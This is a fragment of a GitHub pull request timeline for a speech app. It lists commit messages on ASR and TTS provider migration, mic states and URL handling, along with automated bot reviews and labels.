feat(asr): migrate aliyun to bailian realtime and simplify settings

1a4e118

fix(provider): restore model/voice dropdown and lock aliyun asr realtime

e0f718e

fix: stabilize ASR stream and split mic test/live flows

8191bb9

feat: add explicit mute/unmute mic visual states

3808c0a

feat(tts): migrate speech providers to backend direct routing

7af80a4

greptile-apps bot reviewed Mar 1, 2026


github-actions bot added the following labels on Mar 1, 2026: area/backend (touches backend, FastAPI/Python); area/frontend (touches frontend, Vue/TS); needs-review (needs careful review, large/complex changes); size/XL (PR size: >= 1000 lines changed); type/feature (new feature).

github-actions bot reviewed Mar 1, 2026


qodo-code-review bot reviewed Mar 1, 2026


fix(tts): harden provider URL handling and local voice loading

8612a4a

github-actions bot reviewed Mar 1, 2026
